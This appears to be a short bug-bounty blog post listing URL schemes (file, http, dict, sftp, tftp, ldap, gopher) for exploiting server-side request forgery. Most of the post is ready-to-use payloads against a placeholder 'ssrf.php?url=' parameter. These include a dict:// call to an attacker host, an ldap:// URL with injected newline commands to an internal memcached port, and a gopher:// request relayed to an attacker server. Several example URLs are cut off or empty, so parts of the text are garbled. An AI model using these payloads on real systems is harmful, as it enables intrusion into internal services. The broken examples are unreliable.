SSRF exploitation via URL Scheme

SSRF exploitation via URL Scheme

1-File:Allows an attacker to fetch the content of a file on the server


2-HTTP:Allows an attacker to fetch any content from the web,it can also be used to scan ports ssrf.php?url= ssrf.php?url= ssrf.php?url=

3-Dict:DICT URL scheme is used to refer to definitions or word lists available using the DICT protocol =dict://<user>;<auth>@<host>:<port>/d:<word>:<database>:<n> =ssrf.php?url=dict://attacker:11111/

4-SFTP:A network protocol used for secure file transfer over secure shell ssrf.php?url=s 5-TFTP:Trivial File Transfer Protocol, works over UDP ssrf.php?url=t

6-LDAP: It is an application protocol used over an IP network to manage and access the distributed directory information service ssrf.php?url=ldap://localhost:11211/%0astats%0aquit

7-Gopher HTTP gopher://<proxyserver>:8080/_GET http://<attacker:80>/x HTTP/1.1%0A%0A



#SSRF #exploitation #BugBounty

Be the first to comment

Leave a Reply

Your email address will not be published.